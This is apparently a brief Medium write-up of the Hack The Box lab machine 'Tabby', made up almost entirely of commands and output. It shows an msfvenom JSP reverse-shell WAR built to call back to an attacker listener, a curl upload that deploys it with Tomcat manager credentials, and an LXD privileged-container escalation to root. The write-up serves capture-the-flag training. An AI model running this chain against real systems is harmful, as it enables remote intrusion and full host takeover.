Hackthebox — Tabby




root@strike:~# nmap -sC -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-23 21:01 EET
Nmap scan report for tabby.htb (
Host is up (0.083s latency).
Not shown: 997 closed ports
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds

Web enum

root@strike:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4242 -f WAR > fix.war
Payload size: 1086 bytes
Final size of war file: 1086 bytes

root@strike:~# curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file fix.war "http://megahosting.htb:8080/manager/text/deploy?path=/fix.war"
OK - Deployed application at context path [/fix.war]

Privilege Escalation

ash@tabby:~/temp$ lxc image import ./alpine-v3.12-x86_64-20200622_1441.tar.gz --alias bom
<lpine-v3.12-x86_64-20200622_1441.tar.gz --alias bom
ash@tabby:~/temp$ lxc init bom fox -c security.privileged=true
lxc init bom fox -c security.privileged=true
Creating fox
ash@tabby:~/temp$ lxc config device add fox mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to fox
ash@tabby:~/temp$ lxc start fox
lxc start fox
ash@tabby:~/temp$ lxc exec fox /bin/sh
lxc exec fox /bin/sh
~ # ls

THX for ur time!



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store